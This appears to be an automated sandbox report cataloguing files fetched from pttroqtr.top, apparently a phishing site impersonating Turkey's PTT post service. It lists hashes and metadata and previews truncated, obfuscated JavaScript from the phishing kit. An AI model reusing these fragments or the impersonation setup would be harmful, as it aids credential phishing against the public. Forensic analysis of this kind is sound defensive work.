                                                                                                                                                                                            Preview:var a2_0x49024d=a2_0x20dc;(function(_0x339814,_0x1d1181){var _0x457781=a2_0x20dc,_0x2f5f94=_0x339814();while(!![]){try{var _0x876046=parseInt(_0x457781(0x415))/0x1*(parseInt(_0x457781(0x42a))/0x2)+parseInt(_0x457781(0x6e7))/0x3*(parseInt(_0x457781(0x3e2))/0x4)+parseInt(_0x457781(0x56c))/0x5*(parseInt(_0x457781(0x436))/0x6)+-parseInt(_0x457781(0x29d))/0x7*(-parseInt(_0x457781(0x4b3))/0x8)+-parseInt(_0x457781(0x601))/0x9*(parseInt(_0x457781(0x522))/0xa)+parseInt(_0x457781(0x4d2))/0xb+-parseInt(_0x457781(0x2b4))/0xc;if(_0x876046===_0x1d1181)break;else _0x2f5f94['push'](_0x2f5f94['shift']());}catch(_0x13a41e){_0x2f5f94['push'](_0x2f5f94['shift']());}}}(a2_0x249c,0xe51e5));var a2_0x1c7adf=(function(){var _0x1ca7ef=!![];return function(_0x448b2e,_0x3b2af0){var _0x1ee66c=_0x1ca7ef?function(){var _0x281dcb=a2_0x20dc;if(_0x3b2af0){var _0x26480f=_0x3b2af0[_0x281dcb(0x51d)](_0x448b2e,arguments);return _0x3b2af0=null,_0x26480f;}}:function(){};return _0x1ca7ef=![],_0x1ee66c;};}()),a2_0x5e5ab1=a2_0x
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 411 x 254, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):17267
                                                                                                                                                                                            Entropy (8bit):7.940505571110385
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:4K26QEjGZsW/o2WC2UG4KAcgsnfhmPCISSY2/coxq:4KHQNZs0ot9Ms2CISMVq
                                                                                                                                                                                            MD5:FA3EF547EDCD4B3475DCA6E7F443AD2E
                                                                                                                                                                                            SHA1:0B2F7E33F94BEA04697CB4E08CDB864833D039F8
                                                                                                                                                                                            SHA-256:89019CDF74ECD13163AD6E7D0BB69820682D5FA2DC5D5793297FD8C286BF1BF0
                                                                                                                                                                                            SHA-512:6202874D5180C07B880F893864F1B5AA251197CC8681BFC3255D312A493A11CC678720980A8BDED4AE04C39119EB3D99EEB9F840D981FC362DC243E78AC904A6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR....................sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^..x]G....,.[.]va...... @..@.....a)..i.e.-...Y....B....w[.d.*.m.H..lK.l....~g.ru5..s..._...{.s..w.7.<..B.!9C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;sDl.X;>..N.!..#bc......._...P..1v..C.g..)...F.[..E.+.w...}p..1.]!{F.'...N...'....m.....F.O.v...q.+BH<sf..L.Z...~...]....!Ui.s..sS.}.e.......K.Ar...,...?[.j...6....gZ..{.F....iV.....|...........V........N......^.f.uE.}t.=....Dy..Qw$!$.95gcv\a...Y.lkV.bM.{...#..\k..rkG7Z;...Mv....r....KW....k8..I..H.!r.?\.n..W.........t....C.n..vg.q....=&.=..{....BH.s.A@...f.K.Y,...9"<..{..3../=.UgZ.F.h.W...;....~t.\:......TL.2Wa?..v.m.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (18369)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):18593
                                                                                                                                                                                            Entropy (8bit):5.712888637345886
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:xE+fKMCY42wpgfvlqjUU4Qar3OTLc6rZ0opgTMFIowsPN:xEhFpWqjUURCeTo6rZ0/T+IoV
                                                                                                                                                                                            MD5:615C089C71C979729E2BCF60A61D7934
                                                                                                                                                                                            SHA1:4A3FCB37162D27CFCC228E4606266F98354D77E4
                                                                                                                                                                                            SHA-256:A8D792CFA16979C7A84EB1BDBB4107885941F7901C25944EA96EE2863FC42406
                                                                                                                                                                                            SHA-512:C0DB5C73DF1E01CC845BF365CA3702D2358D983DCC7C8E86283734BDD38F0D2DAC2C3D3AF14BB59927C435DB8CFB37B62A6DE09C3A36A4206F4D65F1E3FE3ADD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/js/ua-parser.min.js
                                                                                                                                                                                            Preview:/*!. * UAParser.js v0.7.21. * Lightweight JavaScript-based User-Agent string parser. * https://github.com/faisalman/ua-parser-js. *. * Copyright . 2012-2019 Faisal Salman <f@faisalman.com>. * Licensed under MIT License. */.(function(window,undefined){"use strict";var LIBVERSION="0.7.21",EMPTY="",UNKNOWN="?",FUNC_TYPE="function",UNDEF_TYPE="undefined",OBJ_TYPE="object",STR_TYPE="string",MAJOR="major",MODEL="model",NAME="name",TYPE="type",VENDOR="vendor",VERSION="version",ARCHITECTURE="architecture",CONSOLE="console",MOBILE="mobile",TABLET="tablet",SMARTTV="smarttv",WEARABLE="wearable",EMBEDDED="embedded";var util={extend:function(regexes,extensions){var mergedRegexes={};for(var i in regexes){if(extensions[i]&&extensions[i].length%2===0){mergedRegexes[i]=extensions[i].concat(regexes[i])}else{mergedRegexes[i]=regexes[i]}}return mergedRegexes},has:function(str1,str2){if(typeof str1==="string"){return str2.toLowerCase().indexOf(str1.toLowerCase())!==-1}else{return false}},lowerize:function
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):7852
                                                                                                                                                                                            Entropy (8bit):7.701456268374696
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:ymBhN4ABVRD1ibtmQrEoD+V+ma6UsleVC:ymTBXWmQ4o6V+mloC
                                                                                                                                                                                            MD5:28C2C809EB83262A1F928F4E821E8F4C
                                                                                                                                                                                            SHA1:AA9B9E2A285AE91583FB4EC2C6234DB478B79540
                                                                                                                                                                                            SHA-256:EFEA9410B633A1E3B80FDE6E1EF291E28BBA38FA4451B3A81D91786A0DBFFBF5
                                                                                                                                                                                            SHA-512:13D6B52E45B07242F1C031F7F25B8C0495DB864289AD0083DAF347FB9C1B4D032D78D039F38BF0AF72F8EEBB6E5802C5C92B7ECEAB09B405F7B083D0E212D3EE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/36.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...9IDATx...Or.F..`d*..........*K+..L...D9...D>A....*.2..N...#.S5....m...".i.._..S..#.T..~.?o....W....'B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B.... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B....'....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q....?k..7.....y..._o....q..o..K.<^...7M..i1.....x.6...?.u...Z...8..oG.Yax{p...V..!.~....v._..M...5...}...AxK..f....~].]s.....o.....I........8..o.d.y...WO*=q. .....<.....z....`8.m..q.Z....q.#...o?5..v.4V.......m..U.w]...._?....W..Q..v...).Z...8..p..!s...O3'...N.....c...r!..5..........
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):19866
                                                                                                                                                                                            Entropy (8bit):7.886038247408446
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:dSpd2e4QRiLuY9aokvzerh0OuGo8dFoCrIQl5JQwI+h5uYMCbmWxr2xyrBkh+:mMJQw19a17erOo1dZrtzXmVpOs+
                                                                                                                                                                                            MD5:7F20E1AD732C6686C1C7F0353209DDCC
                                                                                                                                                                                            SHA1:057F78EFD3A085BDE99A5FF105F5CCB2A491F1DA
                                                                                                                                                                                            SHA-256:181E423A80ADDA5EA6EBBECFA7D787AD97BFAF0E778EDEAD79F4B3697A24D544
                                                                                                                                                                                            SHA-512:05D12844B31B6F63FB5DE9ADFA83C587C4C350A3E81D32516F40D69FDA94ACC85DE78E012C5F34864BDF48CAB2DBF56308DE723B0B20A0BA9559ABB5718620DB
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..M'IDATx....x\wy.....H..k.%Cn....D!$h.B.M.`e.fi..e.l..-V..l!...,......-...\..F..@!.%!...1!!$!...%.%..=.?..h$.9s.3...<'.n3g......522"....,U.....B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.(I.%am......7kdd....B\....k.jm.....23.?.So..fm.Q9;.M..T..."t..........TD.C=..0.. ........-..km....p....R..].......<.c.3..........gk.:......f.x...8Th...LS..{.}.l...M.....v....0...p.J...A.%...(.&.X.F.......q..4_.Mp.L.-imi...q}...\1.M.K.x..?.x.........~M...n.....8 . .........5....>.Q...V.I.|...N..7.o.[}...C?*.;..k.U....C.P4
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (554)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):606
                                                                                                                                                                                            Entropy (8bit):5.401289515983216
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:fbj/1AvxAU7erXn16KkpooeWozx9LqCmVRXNtI6V:fbj/1AvxAU7e7nHkpyW2pqjXNa+
                                                                                                                                                                                            MD5:2D8CA2FAE27B182791B29D83379AC6FE
                                                                                                                                                                                            SHA1:3E3D56874855FBBF14BA18E99D400079F72E1137
                                                                                                                                                                                            SHA-256:D37FF23D03D4699FEEB8C162D865538D7AEC77436D8AEB54F9652DD3BA497D89
                                                                                                                                                                                            SHA-512:7966E30FDE7A4E6C93C1AB0DC7EC038ED26372434E6E06ED56160DED6539675D7EEF060F783ADE9475ECAF9F269236197E51438A22FDD7BDE5F1A85219B5F92B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/pages/_error-32d9baaae5c99c79.js
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4820],{2904:function(t,n,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_error",function(){return r(6953)}])},6953:function(t,n,r){"use strict";r.r(n);var u=r(3288),e=r(8032);function s(t){var n=t.statusCode;return(0,u.jsx)(u.Fragment,{children:(0,u.jsx)(e.Z,{statusCode:n})})}s.getInitialProps=function(t){var n=t.res,r=t.err;return{statusCode:n?n.statusCode:r?r.statusCode:404}},n.default=s}},function(t){t.O(0,[9774,2888,179],(function(){return n=2904,t(t.s=n);var n}));var n=t.O();_N_E=n}]);.//# sourceMappingURL=_error-32d9baaae5c99c79.js.map
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65329), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):161114
                                                                                                                                                                                            Entropy (8bit):5.144436389608998
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:9RohK1FtK8YlXSyGwjUnKznBGDhZB/FEG39tBV1z37fb7K0yF2dDIp:8hKuCyGwjUnKr+RbNtBV1z3LTNC
                                                                                                                                                                                            MD5:C3DCC3BE21F2F8D1CF00E2E339C699D1
                                                                                                                                                                                            SHA1:6BE6BC9EDAAA3403BF504DCEA10F7C2104102434
                                                                                                                                                                                            SHA-256:992416AF8318FB013AED368155200BE56B07B52E70A21A80A1312E721ADAFBA5
                                                                                                                                                                                            SHA-512:90F7410507965DAD04F076A10D3F10929AD7FEBA071901D6C17BBE014351AA48FF6C3168B3CDEC7F8153C1353EADCE8D5100907C88E73CC8CC88AD1BB4A07748
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/f3c7e6fbJxKnW.js
                                                                                                                                                                                            Preview:const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt(_0x303bae(0x1a8))/0x4+-parseInt(_0x303bae(0x896))/0x5*(parseInt(_0x303bae(0x146))/0x6)+-parseInt(_0x303bae(0x566))/0x7*(parseInt(_0x303bae(0x148))/0x8)+parseInt(_0x303bae(0xbb))/0x9+parseInt(_0x303bae(0x1a4))/0xa;if(_0xc1e4b0===_0x34a38e)break;else _0x22f25a['push'](_0x22f25a['shift']());}catch(_0x2a237d){_0x22f25a['push'](_0x22f25a['shift']());}}}(a33_0x38b1,0x5cb8c));function a33_0x38b1(){const _0x576f75=['em_ptt_abo','cz0ndHJhbn','>Tebligat\x20','ON\x22\x20id=\x22__','-32','/a></span>','kta_hizmet','YT48L2Rpdj','class=\x22ite','bank.ptt.g','l\x20ui-widge','tAk%C4%B1l','JvZHVjdGlt','age\x20has-su','#ptt_diger','FgIFJmdfMT','lateliUst.','Link\x22\x20clas','d-4\x22><a\x20id','-search\x20sx','tt_pttmati','klamalari','w.cimer.go','0\x20auto',
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):16498
                                                                                                                                                                                            Entropy (8bit):7.8582701910541655
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:9ogvnYzo4hpswgtGt8n9o4KsbPHRT8DGCkj21VEwU:DnSxrsLtGt54trHx8D3U
                                                                                                                                                                                            MD5:9A038EA93F4919E25D2064BA48874586
                                                                                                                                                                                            SHA1:4996E14DCB1BA05CD29D19C45DFAABA45AA3BCC2
                                                                                                                                                                                            SHA-256:49FE57608D794F7B7F923847B653CCEC67C5C2083906CB5780ECD7B8F22BFD16
                                                                                                                                                                                            SHA-512:6A9918EA7AE0DEDBAA1E9D0FC7D41274FEE90C9D29A5254D4F33C4BF87827425CA0B4CDAB76C62AE79A9AB4CB28AA9857E4F4A72CD5612DA45565630CA3AE5E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/39.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx.......]..G..e#{W...N.vDR!..]a...cG!.]*G4.|..;"..~\..@...4.;..:N."......A.;'...#..r.G..4..1.8...'..v.%...{...........g...:.....~>.....c...P,7q.....q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ....<2_.^......q(.=.lt./u/.U8....X....p.`.......k.{-k..4.P>.Q.r...C..G.My.u..|.3..!.........u...^M/.mqt&2.I..|....jK..^...^Hj.p\.......+....6..5.6g;@..t.9..........P7...lz5.....y..".x.%. ..qo..).lw)f0.Pc...0.!.dz.!3c.......w..q...l.....l..C.....n%.&$.......q
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (435)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1638
                                                                                                                                                                                            Entropy (8bit):5.1590572904491
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:lp6uGkcrVAGpAL+RdZyFjHyoH/XlukT2F1bziHpciH/oH/w:lERr6DCZydHRH/XluB1niHaiHgH/w
                                                                                                                                                                                            MD5:00B17816E749FFE05B96561CFA6EC7FE
                                                                                                                                                                                            SHA1:55CB98153952808CC274D7608D17A36897921BF8
                                                                                                                                                                                            SHA-256:9A59F865220295BD945A89A98BA32654D6AD01CE00D9F2FA098238C665D8D7BB
                                                                                                                                                                                            SHA-512:2083C2287146581310A78C4E79FFD9C726B218767D40A64A7CACBE0CF28BBBE2A1ABA173B26F273C995D19F16D1BD3A92759DB97171C7DE5149A37E4EA3F1E9C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/
                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8" />. <meta. name="viewport". content="width=device-width, initial-scale=1.0, user-scalable=no". />. <script type="module" crossorigin src="./assets/index-f5457718.js"></script>. <link rel="stylesheet" href="./assets/f6170fbbkFGym.css">. <script type="module">import.meta.url;import("_").catch(()=>1);async function* g(){};if(location.protocol!="file:"){window.__vite_is_modern_browser=true}</script>. <script type="module">!function(){if(window.__vite_is_modern_browser)return;console.warn("vite: loading legacy chunks, syntax error above and the same error below should be ignored");var e=document.getElementById("vite-legacy-polyfill"),n=document.createElement("script");n.src=e.src,n.onload=function(){System.import(document.getElementById('vite-legacy-entry').getAttribute('data-src'))},document.body.appendChild(n)}();</script>. </head>. <body>. <div id="app"></div>. . <script nomodule>!function(){
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):112550
                                                                                                                                                                                            Entropy (8bit):5.311884237132668
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:P/OLp3mvR71BPJJipknKTfLswZA4u1ZHA0Yr+4UuKcOHUPHbbcAnK:P/OLNmvR71BPJJip1TfYwZA4u1ZHA0EA
                                                                                                                                                                                            MD5:9D404836256B5CCA87EC2DD4E6C5B851
                                                                                                                                                                                            SHA1:2E8C690AD11ADC6A062B6275508D9DE3DE50E96F
                                                                                                                                                                                            SHA-256:0A692D8595918A8DE18443C98340B61F39B25C3F66C53C28BED94FF18B7E6EC0
                                                                                                                                                                                            SHA-512:BB9E2EAA4C4FCC6274E0BB0EBC76318EDB828184C0172C98B1DEB049D6E8862F28DD26B4AFAA4ADAF4C7C4D0CFBC7FA1D610C2ACBD3D598F3025ACF91B775D13
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/0e738ae1JxKnW.js
                                                                                                                                                                                            Preview:const a1_0x54146a=a1_0x1a33;(function(_0x15019a,_0x4bd1ef){const _0x4ad14f=a1_0x1a33,_0x4f09df=_0x15019a();while(!![]){try{const _0x23aed6=parseInt(_0x4ad14f(0x1c0))/0x1*(-parseInt(_0x4ad14f(0x1d2))/0x2)+-parseInt(_0x4ad14f(0x1e1))/0x3*(parseInt(_0x4ad14f(0x291))/0x4)+parseInt(_0x4ad14f(0x150))/0x5+parseInt(_0x4ad14f(0x2d1))/0x6+-parseInt(_0x4ad14f(0x2a6))/0x7+-parseInt(_0x4ad14f(0x13a))/0x8+parseInt(_0x4ad14f(0x1d0))/0x9;if(_0x23aed6===_0x4bd1ef)break;else _0x4f09df['push'](_0x4f09df['shift']());}catch(_0x753273){_0x4f09df['push'](_0x4f09df['shift']());}}}(a1_0x1319,0x6eb50));const a1_0x243f17=(function(){let _0x2d03c3=!![];return function(_0x7dff9c,_0x52e3c8){const _0x3d297c=_0x2d03c3?function(){const _0x153071=a1_0x1a33;if(_0x52e3c8){const _0x33276f=_0x52e3c8[_0x153071(0x36d)](_0x7dff9c,arguments);return _0x52e3c8=null,_0x33276f;}}:function(){};return _0x2d03c3=![],_0x3d297c;};}()),a1_0x454d09=a1_0x243f17(this,function(){const _0x52e53d=a1_0x1a33;return a1_0x454d09[_0x52e53d(0x1c2)]
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12814
                                                                                                                                                                                            Entropy (8bit):7.837700315737001
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:8Kx9O7t/pK3/1itZQNeNuSkxTASsDcsDgivX58+XSqsho8M256x2H:8qO7t/pKP1iXQNFSkyDFk8X58azsn+6
                                                                                                                                                                                            MD5:6B7AF6A2B7BD0D796AD01641D6EC5B09
                                                                                                                                                                                            SHA1:A3CA47AF0E4F628E3093FE6B8DBA29C141075D2C
                                                                                                                                                                                            SHA-256:E21FDDE02EC42C12B46323A47FAAAE176F1F4BCD33BB72CFCD5F54AF303369F1
                                                                                                                                                                                            SHA-512:A559D77D27B8EA66686893DFA42DE749B666C23E4CF19CEB0C1D91D19232906E31D2A2B0B070CECF84F02F8A83A40074DD7793AA118E33A2F63B1A590AB9DCF8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..1.IDATx...Mv.F.7`.=wn.....).L.....W`e..W.y.....^..IOC. .......[.6.H">.$(>.9l.-.....CU...........)...!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@.....99*_...4.@.cO<.....(_.2.M....a}...W.p....A.E..R...k...O....j\...>J.r....m.....*..m..e.D....:.....2....b.Nk..|.e..q...F..<..Mq.B7..e.[).'..".|..b^.}p......(..'-...\.Y.......[?..5......rqu.....I!/*..LWe.su...n\...g.}U..R...l.-.\.>Z...?.v..w.rM.. ..t.\..K.u..~..h.z.......E.0W..c.2u]..5.a..>.Xn.>.0 .. 7+.u.<..ec.KvP!.)...J.sv_fh.=..}.,...P........i..E.....I
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4086)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4139
                                                                                                                                                                                            Entropy (8bit):5.396169414887138
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:MxxRw7sQE5qZ1WjOaeUgm6AVt1VPe69ubUzo9nx:6xr5UefoABUdUzunx
                                                                                                                                                                                            MD5:94C8ECC84AD96FF2F711474D44C3F302
                                                                                                                                                                                            SHA1:9D8B81EE6BE85E30F301D243F388A69970CC9AD1
                                                                                                                                                                                            SHA-256:F3E1DE4C82509C765893A33967FCF40DF693F133C7C97F2E6D975A076DA532FA
                                                                                                                                                                                            SHA-512:FDFE22F9469C5A772A9980B1563C6FF33BEB00F04D005257DD922D56D12C64BF5986E939B9EA8D9E3747466534EA6BAE64193911666DEF5E94AD19C72A7EBA3E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:!function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r].call(u.exports,u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u){if(!r){var i=1/0;for(d=0;d<e.length;d++){r=e[d][0],o=e[d][1],u=e[d][2];for(var f=!0,c=0;c<r.length;c++)(!1&u||i>=u)&&Object.keys(n.O).every((function(e){return n.O[e](r[c])}))?r.splice(c--,1):(f=!1,u<i&&(i=u));if(f){e.splice(d--,1);var a=o();void 0!==a&&(t=a)}}return t}u=u||0;for(var d=e.length;d>0&&e[d-1][2]>u;d--)e[d]=e[d-1];e[d]=[r,o,u]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(r,o){if(1&o&&(r=this(r)),8&o)return r;if("object"===typeof r&&r){if(4&o&&r.__esModule)return r;if(16&o&&"function"===typeof r.then)return r}var u=Object.cre
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):504521
                                                                                                                                                                                            Entropy (8bit):5.245686837916366
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:NtjBw2fR0+JDC9yvd8l8hiuyaqQeuKiv7fD6oAj0BBlNAroY4DPindxfy3GOpBJ/:feSDypuKiv7fD6oAj0BBlNA2exfy1Jfn
                                                                                                                                                                                            MD5:1E8E7D0C756EE63FCBCED0E685E20191
                                                                                                                                                                                            SHA1:1E7AEC9DE709ADDED1E8D31B0D449C3D05B68810
                                                                                                                                                                                            SHA-256:294E75B0E7510057A175FFF959C4EF20249DA107A3CE2CEE0D5A19CB138694E4
                                                                                                                                                                                            SHA-512:B1E1BDC77DBA9F648B0BE98A8BB2959E135103D51D203B3714419F59E81AEE5DD53B02E206862AF80109FA5A336DFC7E707D35906514D8008ED9FF888FDE64ED
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/index-f5457718.js
                                                                                                                                                                                            Preview:var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1bf(0x644))/0x4)+parseInt(_0x9ea1bf(0x58d))/0x5*(parseInt(_0x9ea1bf(0x690))/0x6)+-parseInt(_0x9ea1bf(0x41c))/0x7*(-parseInt(_0x9ea1bf(0x14d))/0x8)+-parseInt(_0x9ea1bf(0x51f))/0x9+parseInt(_0x9ea1bf(0x236))/0xa*(-parseInt(_0x9ea1bf(0x283))/0xb);if(_0x53ae22===_0x549cdb)break;else _0x218c3b['push'](_0x218c3b['shift']());}catch(_0x1145ce){_0x218c3b['push'](_0x218c3b['shift']());}}}(a38_0x4822,0xe70f6));function Px(){var _0x1fb5ac=a38_0x435b;import.meta[_0x1fb5ac(0x53c)],import('_')[_0x1fb5ac(0x639)](()=>0x1);async function*_0x3e9403(){}}(function(){var _0x134f30=a38_0x435b,_0x476729=(function(){var _0x4ea9eb=!![];return function(_0x3eb55f,_0x1b8e91){var _0x3870d7=_0x4ea9eb?function(){var _0x12f3a9=a38_0x435b;if(_0x1b8e91){var _0x30af4e=_0x1b8e91
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                            Entropy (8bit):4.251130351888073
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:t9LylyxETgF0Kq7mgctL++X8UEIZDXzdB+rH:2lPTgF0Kq7mggH8UZ7YH
                                                                                                                                                                                            MD5:9090C370EF1DD7BBF36DF3798544DB2B
                                                                                                                                                                                            SHA1:A10781354CECA73AA753B38711C44C8256CEF934
                                                                                                                                                                                            SHA-256:7B4D3164246248283743096A9DAECF1178F07DF98F2EECBCD698208CD81CF2CD
                                                                                                                                                                                            SHA-512:B8F3A64026602230E92FDEC3FF914D552729FC9FA107635E6161A1CCAC090E02E87A4A99ADE4432FE23BF680165407715C717AFDE663D2A83486D945315F569A
                                                                                                                                                                                            Malicious:false
